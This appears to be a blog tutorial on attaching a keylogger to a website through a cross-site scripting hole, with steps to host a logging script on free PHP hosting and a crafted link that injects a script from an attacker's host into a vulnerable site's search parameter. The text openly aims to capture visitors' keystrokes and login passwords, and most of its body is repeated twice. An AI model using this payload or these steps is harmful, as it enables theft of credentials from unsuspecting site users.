key logging with XSS
Keylogger is the tool which is used to record the key events. We all know about the keyloggers used int the computer to capture the keystrokes. But this tutorial guide you to create and use a keylogger on a website to capture all keystrokes on that page.
As the name suggest, It only works on the website that are XSS vulnerable. As we know that we can run our own scripts on those website which have XSS vulnerability. We use our Keylogging script on XSS vulnerable website.
For this attack we need three things:
First of all download Keylogging script from Here:
DOWNLOAD
Now create an account in any free hosting web host that supports PHP. PHP will be used to write keystrokes on a text file.
Now open Logger.js and change the URL of your script. Default URL ishttp://yourwebsite.com
Change it to your hosting URL.
Now host all these scripts on your web host.
Now find a XSS vulnerable website website and include script link like this:
http://targetwebsite.com/search.php?q="<script src="http://yourwebsite.com/keylogger.js"></script>
Now if someone clicks on that link everything they type in on that page will go to the data.txt file. This script will capture all the keystroke and save it to the file with the help of PHP script.
If a website's login page is vulnerable to XSS attack, this script can be used to grab passwords
As the name suggest, It only works on the website that are XSS vulnerable. As we know that we can run our own scripts on those website which have XSS vulnerability. We use our Keylogging script on XSS vulnerable website.
For this attack we need three things:
- Kelogging script.
- XSS vulnerable website
- A webhosting
First of all download Keylogging script from Here:
DOWNLOAD
Now create an account in any free hosting web host that supports PHP. PHP will be used to write keystrokes on a text file.
Now open Logger.js and change the URL of your script. Default URL ishttp://yourwebsite.com
Change it to your hosting URL.
Now host all these scripts on your web host.
Now find a XSS vulnerable website website and include script link like this:
http://targetwebsite.com/search.php?q="<script src="http://yourwebsite.com/keylogger.js"></script>
Now if someone clicks on that link everything they type in on that page will go to the data.txt file. This script will capture all the keystroke and save it to the file with the help of PHP script.
If a website's login page is vulnerable to XSS attack, this script can be used to grab passwords
Comments
Post a Comment